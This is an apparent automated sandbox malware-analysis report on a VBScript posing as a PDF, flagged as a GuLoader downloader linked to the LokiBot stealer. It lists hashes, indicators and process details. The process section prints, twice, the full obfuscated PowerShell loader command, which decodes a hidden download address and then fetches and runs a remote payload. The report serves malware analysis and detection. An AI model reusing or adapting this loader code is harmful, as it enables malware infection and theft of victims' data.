Malware analysis Happy Fiestas Patrias·pdf.vbs Malicious activity

Add for printing

File name:	Happy Fiestas Patrias·pdf.vbs
Full analysis:	https://app.any.run/tasks/c11c38a4-6b60-4e86-a9c8-5d3047e55d61
Verdict:	Malicious activity
Threats:	GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. GuLoader ist ein fortschrittlicher, in Shellcode geschriebener Downloader. Er wird von Kriminellen verwendet, um andere Malware, vor allem Trojaner, in großem Umfang zu verbreiten. Er ist dafür berüchtigt, dass er Anti-Erkennungs- und Anti-Analyse-Funktionen nutzt. A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. LokiBot was developed in 2015 to steal information from a variety of applications. Despite the age, this malware is still rather popular among cybercriminals. LokiBot wurde im Jahr 2015 entwickelt, um Informationen aus einer Vielzahl von Anwendungen zu stehlen. Trotz ihres Alters ist diese Malware bei Cyberkriminellen immer noch recht beliebt. Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns. Malware Trends Tracker >>>
Analysis date:	September 25, 2024, 07:15:57
OS:	Windows 10 Professional (build: 19045, 64 bit)
Tags:	guloader loader lokibot stealer
Indicators:
MIME:	text/plain
File info:	ASCII text, with CRLF line terminators
MD5:	A08909DD22F1EF8EEE277B3F178A65BD
SHA1:	30D67F8107A95D9A779AA010268421D3ECDDB611
SHA256:	EED0935D0176FBB012006F4E41DE769A2EF84FCB092F06B62BE7CEB250D895D9
SSDEEP:	768:hXwI+o49dnoX82Q/YoTprXzNQvD3L8LbEjWI:SI+5LX2NoTdq83EyI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 120 seconds
Heavy Evasion option:
Network geolocation:: off
Additional time used:: none
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- GULOADER has been detected
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
SUSPICIOUS
- Base64-obfuscated command line is found
  - wscript.exe (PID: 1128)
  - cmd.exe (PID: 4088)
- Starts POWERSHELL.EXE for commands execution
  - wscript.exe (PID: 1128)
  - cmd.exe (PID: 4088)
- Runs shell command (SCRIPT)
  - wscript.exe (PID: 1128)
- Starts CMD.EXE for commands execution
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
- Gets or sets the security protocol (POWERSHELL)
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
- Executable content was dropped or overwritten
  - wabmig.exe (PID: 4108)
- Converts a specified value to a byte (POWERSHELL)
  - powershell.exe (PID: 5148)
- Process drops legitimate windows executable
  - wabmig.exe (PID: 4108)
INFO
- The process uses the downloaded file
  - wscript.exe (PID: 1128)
- Gets data length (POWERSHELL)
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
- Disables trace logs
  - powershell.exe (PID: 6732)
- Uses string split method (POWERSHELL)
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
- Creates or changes the value of an item property via Powershell
  - wscript.exe (PID: 1128)
  - cmd.exe (PID: 4088)
- Checks proxy server information
  - powershell.exe (PID: 6732)
- Converts byte array into ASCII string (POWERSHELL)
  - powershell.exe (PID: 6732)
  - powershell.exe (PID: 5148)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 5148)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

138

Monitored processes

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

1128

"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Happy Fiestas Patrias·pdf.vbs"

C:\Windows\System32\wscript.exe

—

explorer.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft ® Windows Based Script Host

Exit code:

Version:

5.812.10240.16384

Modules

Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

1432

"C:\WINDOWS\system32\cmd.exe" /c "echo %appdata%\Arbejdsform.Met && echo t"

C:\Windows\System32\cmd.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll

4088

"C:\WINDOWS\system32\cmd.exe" /c ^"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe^" "<#Hullabaloos Positionsangivelsen Scrab Claustrophobiac Kluntekro Shantungfrakkernes #>;$Ddstilhed='Dagligsprogsfilosofiers';<#Preguide Pone Amforaers udfoerslen Depilerede Conchie #>;$Fermis=$host.PrivateData;If ($Fermis) {$Hydrothorax++;}function Echinologist($Tailles){$kieselgur=$Tailles.Length-$Hydrothorax;for( $Originant=5;$Originant -lt $kieselgur;$Originant+=6){$Konsulaternes+=$Tailles[$Originant];}$Konsulaternes;}function Misrgt($Enjoins){ & ($Funeralizes) ($Enjoins);}$Eventualiteternes44=Echinologist 'Arse,MG nneo O kaz Non iVekselRadrelBegava A ko/Grand5Overa.B ode0Conce Konce(Ugli.WKr keiBugswnSalvodZool,oRekviw rydsOrnam andeN UngoTS.eln Huffa1Daint0wists.Milit0Ammon;Arbej Im reWSkaraiM.ljanMonos6Skrat4Sky t;Slgtn SlutvxBygue6Afbjn4Unc.l; pids Teresr Rillvmesom:Arbej1Ideam2Spejl1Skife.Bysv 0 Skol)Megar ChiliGChondeMeddec WagnkCykeloGifte/Insti2 Over0dygti1 A,tr0Attir0Modga1anste0Hnge.1Mdend ForbeF G rki IndorIndfrecobusf Si,eo Eksax U ug/Tvanm1Tolvt2scene1Heads.Choli0Gains ';$Discide=Echinologist 'Estrau Ur tSFornyEh,aneRDisen-Dea tA.goloGD tekEBuretNIsaleTH.mat ';$Chthonophagia=Echinologist 'UaflahSpanct FicutEveryp Lnn,sMa,ne:Forbj/Giant/ tyrid Forer LovpiBaccav vereStrug.HovedgGenbao AvocoJernhgjern lThe,neteeth.sy,afcImproo prrsmUmora/F,siou BleacUng n?BiplieC stixNglepp Fre oHydrorpileatArbej=BrnepdAbstro nfewS,tinnUnsc l FugtoForm aGyptodAplod&E stei Sq adTuris=Triet1UdstiOG saniBatrawRessoeTelevcI ratMUhens9 Amasi TibeuHjerns FluerUptru-Pent osamlipAnskaJSoli NSpectGArtisS diopUAfske7Pre,au ToguS,letfXCalypsEl,paAChrisjMis nTAssatu OpnagLefle8 M vibPartuQ .ipt ';$Daasemads=Echinologist 'Eig.t>obsku ';$Funeralizes=Echinologist 'D.kediDampbEK.ltuXforre ';$Garderofficers='Dagbder';$Rete = Echinologist ' ResueSvabecMonsthSonicoUnde. Inte%d mflaEfterp Flatp Sku dVenoua Furrt ongtaTroub%Nonfo\MisplAPrintrBankib B greStumfjkonfidGlycosskke fPintao MedfrCadmimKidna.FunarM ntioePe entStake vaa.n&Reven&Shone VigtieUdskrcSolidhOver.oPheno BildetP ogr ';Misrgt (Echinologist ' Sjus$HypocgJudgmlDossio ,egrb RisoaVortelAphod:Aegi,G Elver winsoMiaeovUprodssamueo N herPlet tErklaeM safr Var,ekoldsdKomedeMoppe=Overh(Tandlc OblimAggludChang Ufr h/ Co lcHyl e Tilfl$Ikon RDrifteTr.jet AmbeeRib,f)Forsg ');Misrgt (Echinologist ' Evol$UnpargAgterlHandeoPeytrbRetnia UngdlTre,v:gymnaA B cemUharmoKr,gvvRamulaC.emob ntenlskinneCenog= .tri$DoubtCBolsth Pa et IndbhAbdomo P.ecnClurioD,ylipShotwhTrimlaLatrig BarciMultiaNonin.Cic rsrgbomp Distl Snkei Wyndt Baga(Cater$ FratDAfloea ,rina Spinsstorme PlasmRestaaStilhdKubiksFaste) I tr ');Misrgt (Echinologist ' T,po[SerigNIns reClosetUndem.SkysoSF lkeetild rScar v yhei PoeccUreeleLerv PD uteoXylotiAmy,dnGeorgtHjemtMDuinha Be anBlinyaGeddegFemreeC romrLrer ]Sp ld:Trrev: PremSMidweeToit cPynteuBes.yrSc,ibi raadtSit.ayB.rerP Ult.rFri to IneftSymbioUndtacInhaloCrotclBorge Outt=Utopi Hvsse[BenetNUnoedeMuhamt usti.CadpaS Boeme.ontrcBrgsruLommerTur.ciBe.ent Prefy MatrPFedssrPulvioAdonitfrie o EnthcDinosopilhelc hobTS utnyUnderpPaakle D,sl] Toru:Skild:Bl mmT TeknlExpersBitte1Syste2Gel t ');$Chthonophagia=$Amovable[0];$Otohemineurasthenia239= (Echinologist 'Me ne$gangeGGenkeLBer.doTax,tBpligtaAfsliL Fo,l:Verdet njedAUnslopTh eaiLeukooarr gkSn ggaClinos Krsl=ManasNGruntECha uWD opo-beskyo.jergbWafflJHjhalEGarveC ,alutFll.s RagonSSidehy.edles Ch,vT StraeSquusmphson.,tarrNOsmogeArbejTOverc.KatalwslipcEMa thBByud c Diffl ypeIAfrydeCo.toNForreT');$Otohemineurasthenia239+=$Grovsorterede[1];Misrgt ($Otohemineurasthenia239);Misrgt (Echinologist 'Euroc$SubfiTUdvenaV.lgcpPan ri P choFiskekDopinapla,ssSpndb.BortfH Ra,he LektaDessidD ppeeMan mrBacchs Over[P ntu$BevilD Sed,iPlycys En ycOphobi algdPoplie Duft] Tran=Lysty$VisseE DemovUnfugeDes,rnPer et.lystuFllesaArbejlBeth iP ecot lelse,istetPresueKon ar precn SemieSondrsbinde4Car n4Retsm ');$vulcanising=Echinologist 'I mit$ araTBananaVir dpIm.asi,ntrkoSrstikCartoaUnadas Vejl.St,reDFarrootmme wAdjudnU dgalAlberoIdentaVaeggd T taFKrimiiVap elTopmee Bnde(Afsen$ LandCDiatohPo,ittAn lyhAtaraoAlaban uderoRockapHe.tihMi haa mpieg,trreiB sacaFluor,Cath,$ BrugSFu.unaQuoticFrilucBucklaFrem,tPantoePhantdJugos) Au o ';$Saccated=$Grovsorterede[0];Misrgt (Echinologist 'Sidde$Hueytg,tjdmlChinboPlankBSc reaKalkil Erhv:Hum rDKontriDugrusBlinkCReallOPletfVCal bEAnen rTilba=Vain (stabstForstE Be dsOrbitt E.id-AnalyP CommaRane T AcetHChori Acrot$ AndeS AlzhaOu plC TimecAfstiA AsunTSk tlEAfsttDAfgre)ikend ');while (!$Discover) {Misrgt (Echinologist 'Ba,ta$Un ragOligol albloSnustbsna.sa Strel ,nai:TrichPA,mrgiHabilfVarittrustieKingnnKommidMinise Jon sShi.e=Distr$ orlgtUdk tr,aneruEquipe Pred ') ;Misrgt $vulcanising;Misrgt (Echinologist ' DragSKogeut India Multrcr sst omm-hyoglS fje lBldgrehusfreMolehpVoldg Triv4Un,oo ');Misrgt (Echinologist 'Bogh,$ PerigMarmilAns.oo So abTop oa UnsolTen,a:PegboD IncriPodgisHypo.cSatiso Dub vDhubaeAftenrIndiv= B,bo(harmeT Sli eModkrsForretBrode- HypePcharmaPy alt kolehCla a Woma$WirycSFrbida,andicUngdoc Kr kaMaskitDen re Bir dHydro)Chain ') ;Misrgt (Echinologist 'Topng$Fermeg mo olQuisqoSinnebOrganaCocitl Besi:SdebaGCocu.einattlArthrafr,metAvissi TibinForglo GolfuDra,osQuillnUnytteScrapsStalwsLapse=Fortr$Sexfig ,rlilVaandoMlkeabElen.aMyrerlParfu:UnderkDisksuMyxedm HistmgtefdeCombirUn unfGarmeuPyrotlJallsdColla+Grani+Unend%Lftep$dollyALoek.mDobbeomicrovPrereaBrianbAs,ral joine.sagt.Heltec ,ffro.cameuCloudnTautotBuste ') ;$Chthonophagia=$Amovable[$Gelatinousness];}$Originantnfektionernes=327153;$Analysevrktjets=29478;Misrgt (Echinologist 'Gymna$InhabgSpro lHaandoAugusbLoy laBarbelUnder:Op reB Herma BetrgSlaafa tratom gneHi tolU,full PljeeNot,trUnindnRubi eMinersKenne Trans=P oto cratG DireeIndryt Terr-KilomCTils oS ormnPrebetEmotieReopenSmugltRet p Manxm$rin.lSA suraEclipc Kly,cRbdigaC pittnonscepapirdFradr ');Misrgt (Echinologist 'Vides$ utpog OverlfirhnoBerimbVandla zonel dkon:AmatrP UvoraKonstrFjer tHattyiCroupkBranda BorgmGollymCurtseu,nderCirc.aNonr t Udls Sabur=Grs n carti[VanfrSKilobyAvo,ts Tj,etM diceKrystmJi te.BevvyCSlveroKorpunFlosvvKhalieDis nr Uns,tCh ff]Oeill:Belli: P,rvFR,adgr DermoPseudm ZastB HestaAn oms Mi,ueRee.s6A sem4 erumSUr.ditProv.rLe.chiNdv,gnsplejgSmidi(I,pli$NeophB Mi.taTon ugL apfaStuditAs.erebrazelGeniilHekseeEnsterB ngnnLicheeUnrepsXant )Kam.e ');Misrgt (Echinologist ' Plan$Time gAilanlEkst.oHasarbbad tabrylll Br k: RoosKEileroRockenTritefPrj iuIrretnYamaldnoto e nderrLgtrieTo ngrDefen Cerem= ivej ,arla[CarilSSulfayPedansUnreftTsa,deF,rstmGe re.HundeTHospieSnri x Gropt Lrke.De,atE Fo tnFrforcTaxemoCreepdReseriNonconGonotgLeg t]Styrk: Ut,k:KonjaAbag.oS UdfoCMicroI BereICumul.JagteGTils.eTealetUnfaiS ncomtPyrolrdispeiUnbehnincorgProto( Reh.$O erdP,krigaBoggrr Ge rtWathfiKineskRegaiaGravemCompemRhab,e.reemrMedieaUps.etAm,lg)Reass ');Misrgt (Echinologist 'Tilse$ K,angReflelPjanko Beg bSjus.aUnstrl ddat:SaddlSGraveeKongesVed.iqNordsuLsniniLivsfbAstiga Femes erriLssedc rbor=Bonds$dampnKBevgeoFrasenHourifV.ljeuPebrenUnderdMena eEjendr Fetie St er Yder.Respes Br,gu Sk ubCanaisStrobtAe,oprTang iSammenTurm gFiske(Repul$ MicrOKontorSor.niPrepagP lsaiOrdren Du la Maken,egertDio.gnDuvesfUbemreHygrokPo metdveskiRasp.oResulnTwadde Titrr orgnUnpaselaagesTitan,Stra $CheckA FervnPseudaAtte,l triky DialsNonmaeAntiav,kyllr Br,skBelbstBevikjS olee MaustpreansA ten)Optio ');Misrgt $Sesquibasic;"

C:\Windows\System32\cmd.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

4108

"C:\Program Files (x86)\windows mail\wabmig.exe"

C:\Program Files (x86)\Windows Mail\wabmig.exe

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Microsoft (R) Contacts Import Tool

Version:

10.0.19041.3636 (WinBuild.160101.0800)

5148

"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Hullabaloos Positionsangivelsen Scrab Claustrophobiac Kluntekro Shantungfrakkernes #>;$Ddstilhed='Dagligsprogsfilosofiers';<#Preguide Pone Amforaers udfoerslen Depilerede Conchie #>;$Fermis=$host.PrivateData;If ($Fermis) {$Hydrothorax++;}function Echinologist($Tailles){$kieselgur=$Tailles.Length-$Hydrothorax;for( $Originant=5;$Originant -lt $kieselgur;$Originant+=6){$Konsulaternes+=$Tailles[$Originant];}$Konsulaternes;}function Misrgt($Enjoins){ & ($Funeralizes) ($Enjoins);}$Eventualiteternes44=Echinologist 'Arse,MG nneo O kaz Non iVekselRadrelBegava A ko/Grand5Overa.B ode0Conce Konce(Ugli.WKr keiBugswnSalvodZool,oRekviw rydsOrnam andeN UngoTS.eln Huffa1Daint0wists.Milit0Ammon;Arbej Im reWSkaraiM.ljanMonos6Skrat4Sky t;Slgtn SlutvxBygue6Afbjn4Unc.l; pids Teresr Rillvmesom:Arbej1Ideam2Spejl1Skife.Bysv 0 Skol)Megar ChiliGChondeMeddec WagnkCykeloGifte/Insti2 Over0dygti1 A,tr0Attir0Modga1anste0Hnge.1Mdend ForbeF G rki IndorIndfrecobusf Si,eo Eksax U ug/Tvanm1Tolvt2scene1Heads.Choli0Gains ';$Discide=Echinologist 'Estrau Ur tSFornyEh,aneRDisen-Dea tA.goloGD tekEBuretNIsaleTH.mat ';$Chthonophagia=Echinologist 'UaflahSpanct FicutEveryp Lnn,sMa,ne:Forbj/Giant/ tyrid Forer LovpiBaccav vereStrug.HovedgGenbao AvocoJernhgjern lThe,neteeth.sy,afcImproo prrsmUmora/F,siou BleacUng n?BiplieC stixNglepp Fre oHydrorpileatArbej=BrnepdAbstro nfewS,tinnUnsc l FugtoForm aGyptodAplod&E stei Sq adTuris=Triet1UdstiOG saniBatrawRessoeTelevcI ratMUhens9 Amasi TibeuHjerns FluerUptru-Pent osamlipAnskaJSoli NSpectGArtisS diopUAfske7Pre,au ToguS,letfXCalypsEl,paAChrisjMis nTAssatu OpnagLefle8 M vibPartuQ .ipt ';$Daasemads=Echinologist 'Eig.t>obsku ';$Funeralizes=Echinologist 'D.kediDampbEK.ltuXforre ';$Garderofficers='Dagbder';$Rete = Echinologist ' ResueSvabecMonsthSonicoUnde. Inte%d mflaEfterp Flatp Sku dVenoua Furrt ongtaTroub%Nonfo\MisplAPrintrBankib B greStumfjkonfidGlycosskke fPintao MedfrCadmimKidna.FunarM ntioePe entStake vaa.n&Reven&Shone VigtieUdskrcSolidhOver.oPheno BildetP ogr ';Misrgt (Echinologist ' Sjus$HypocgJudgmlDossio ,egrb RisoaVortelAphod:Aegi,G Elver winsoMiaeovUprodssamueo N herPlet tErklaeM safr Var,ekoldsdKomedeMoppe=Overh(Tandlc OblimAggludChang Ufr h/ Co lcHyl e Tilfl$Ikon RDrifteTr.jet AmbeeRib,f)Forsg ');Misrgt (Echinologist ' Evol$UnpargAgterlHandeoPeytrbRetnia UngdlTre,v:gymnaA B cemUharmoKr,gvvRamulaC.emob ntenlskinneCenog= .tri$DoubtCBolsth Pa et IndbhAbdomo P.ecnClurioD,ylipShotwhTrimlaLatrig BarciMultiaNonin.Cic rsrgbomp Distl Snkei Wyndt Baga(Cater$ FratDAfloea ,rina Spinsstorme PlasmRestaaStilhdKubiksFaste) I tr ');Misrgt (Echinologist ' T,po[SerigNIns reClosetUndem.SkysoSF lkeetild rScar v yhei PoeccUreeleLerv PD uteoXylotiAmy,dnGeorgtHjemtMDuinha Be anBlinyaGeddegFemreeC romrLrer ]Sp ld:Trrev: PremSMidweeToit cPynteuBes.yrSc,ibi raadtSit.ayB.rerP Ult.rFri to IneftSymbioUndtacInhaloCrotclBorge Outt=Utopi Hvsse[BenetNUnoedeMuhamt usti.CadpaS Boeme.ontrcBrgsruLommerTur.ciBe.ent Prefy MatrPFedssrPulvioAdonitfrie o EnthcDinosopilhelc hobTS utnyUnderpPaakle D,sl] Toru:Skild:Bl mmT TeknlExpersBitte1Syste2Gel t ');$Chthonophagia=$Amovable[0];$Otohemineurasthenia239= (Echinologist 'Me ne$gangeGGenkeLBer.doTax,tBpligtaAfsliL Fo,l:Verdet njedAUnslopTh eaiLeukooarr gkSn ggaClinos Krsl=ManasNGruntECha uWD opo-beskyo.jergbWafflJHjhalEGarveC ,alutFll.s RagonSSidehy.edles Ch,vT StraeSquusmphson.,tarrNOsmogeArbejTOverc.KatalwslipcEMa thBByud c Diffl ypeIAfrydeCo.toNForreT');$Otohemineurasthenia239+=$Grovsorterede[1];Misrgt ($Otohemineurasthenia239);Misrgt (Echinologist 'Euroc$SubfiTUdvenaV.lgcpPan ri P choFiskekDopinapla,ssSpndb.BortfH Ra,he LektaDessidD ppeeMan mrBacchs Over[P ntu$BevilD Sed,iPlycys En ycOphobi algdPoplie Duft] Tran=Lysty$VisseE DemovUnfugeDes,rnPer et.lystuFllesaArbejlBeth iP ecot lelse,istetPresueKon ar precn SemieSondrsbinde4Car n4Retsm ');$vulcanising=Echinologist 'I mit$ araTBananaVir dpIm.asi,ntrkoSrstikCartoaUnadas Vejl.St,reDFarrootmme wAdjudnU dgalAlberoIdentaVaeggd T taFKrimiiVap elTopmee Bnde(Afsen$ LandCDiatohPo,ittAn lyhAtaraoAlaban uderoRockapHe.tihMi haa mpieg,trreiB sacaFluor,Cath,$ BrugSFu.unaQuoticFrilucBucklaFrem,tPantoePhantdJugos) Au o ';$Saccated=$Grovsorterede[0];Misrgt (Echinologist 'Sidde$Hueytg,tjdmlChinboPlankBSc reaKalkil Erhv:Hum rDKontriDugrusBlinkCReallOPletfVCal bEAnen rTilba=Vain (stabstForstE Be dsOrbitt E.id-AnalyP CommaRane T AcetHChori Acrot$ AndeS AlzhaOu plC TimecAfstiA AsunTSk tlEAfsttDAfgre)ikend ');while (!$Discover) {Misrgt (Echinologist 'Ba,ta$Un ragOligol albloSnustbsna.sa Strel ,nai:TrichPA,mrgiHabilfVarittrustieKingnnKommidMinise Jon sShi.e=Distr$ orlgtUdk tr,aneruEquipe Pred ') ;Misrgt $vulcanising;Misrgt (Echinologist ' DragSKogeut India Multrcr sst omm-hyoglS fje lBldgrehusfreMolehpVoldg Triv4Un,oo ');Misrgt (Echinologist 'Bogh,$ PerigMarmilAns.oo So abTop oa UnsolTen,a:PegboD IncriPodgisHypo.cSatiso Dub vDhubaeAftenrIndiv= B,bo(harmeT Sli eModkrsForretBrode- HypePcharmaPy alt kolehCla a Woma$WirycSFrbida,andicUngdoc Kr kaMaskitDen re Bir dHydro)Chain ') ;Misrgt (Echinologist 'Topng$Fermeg mo olQuisqoSinnebOrganaCocitl Besi:SdebaGCocu.einattlArthrafr,metAvissi TibinForglo GolfuDra,osQuillnUnytteScrapsStalwsLapse=Fortr$Sexfig ,rlilVaandoMlkeabElen.aMyrerlParfu:UnderkDisksuMyxedm HistmgtefdeCombirUn unfGarmeuPyrotlJallsdColla+Grani+Unend%Lftep$dollyALoek.mDobbeomicrovPrereaBrianbAs,ral joine.sagt.Heltec ,ffro.cameuCloudnTautotBuste ') ;$Chthonophagia=$Amovable[$Gelatinousness];}$Originantnfektionernes=327153;$Analysevrktjets=29478;Misrgt (Echinologist 'Gymna$InhabgSpro lHaandoAugusbLoy laBarbelUnder:Op reB Herma BetrgSlaafa tratom gneHi tolU,full PljeeNot,trUnindnRubi eMinersKenne Trans=P oto cratG DireeIndryt Terr-KilomCTils oS ormnPrebetEmotieReopenSmugltRet p Manxm$rin.lSA suraEclipc Kly,cRbdigaC pittnonscepapirdFradr ');Misrgt (Echinologist 'Vides$ utpog OverlfirhnoBerimbVandla zonel dkon:AmatrP UvoraKonstrFjer tHattyiCroupkBranda BorgmGollymCurtseu,nderCirc.aNonr t Udls Sabur=Grs n carti[VanfrSKilobyAvo,ts Tj,etM diceKrystmJi te.BevvyCSlveroKorpunFlosvvKhalieDis nr Uns,tCh ff]Oeill:Belli: P,rvFR,adgr DermoPseudm ZastB HestaAn oms Mi,ueRee.s6A sem4 erumSUr.ditProv.rLe.chiNdv,gnsplejgSmidi(I,pli$NeophB Mi.taTon ugL apfaStuditAs.erebrazelGeniilHekseeEnsterB ngnnLicheeUnrepsXant )Kam.e ');Misrgt (Echinologist ' Plan$Time gAilanlEkst.oHasarbbad tabrylll Br k: RoosKEileroRockenTritefPrj iuIrretnYamaldnoto e nderrLgtrieTo ngrDefen Cerem= ivej ,arla[CarilSSulfayPedansUnreftTsa,deF,rstmGe re.HundeTHospieSnri x Gropt Lrke.De,atE Fo tnFrforcTaxemoCreepdReseriNonconGonotgLeg t]Styrk: Ut,k:KonjaAbag.oS UdfoCMicroI BereICumul.JagteGTils.eTealetUnfaiS ncomtPyrolrdispeiUnbehnincorgProto( Reh.$O erdP,krigaBoggrr Ge rtWathfiKineskRegaiaGravemCompemRhab,e.reemrMedieaUps.etAm,lg)Reass ');Misrgt (Echinologist 'Tilse$ K,angReflelPjanko Beg bSjus.aUnstrl ddat:SaddlSGraveeKongesVed.iqNordsuLsniniLivsfbAstiga Femes erriLssedc rbor=Bonds$dampnKBevgeoFrasenHourifV.ljeuPebrenUnderdMena eEjendr Fetie St er Yder.Respes Br,gu Sk ubCanaisStrobtAe,oprTang iSammenTurm gFiske(Repul$ MicrOKontorSor.niPrepagP lsaiOrdren Du la Maken,egertDio.gnDuvesfUbemreHygrokPo metdveskiRasp.oResulnTwadde Titrr orgnUnpaselaagesTitan,Stra $CheckA FervnPseudaAtte,l triky DialsNonmaeAntiav,kyllr Br,skBelbstBevikjS olee MaustpreansA ten)Optio ');Misrgt $Sesquibasic;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

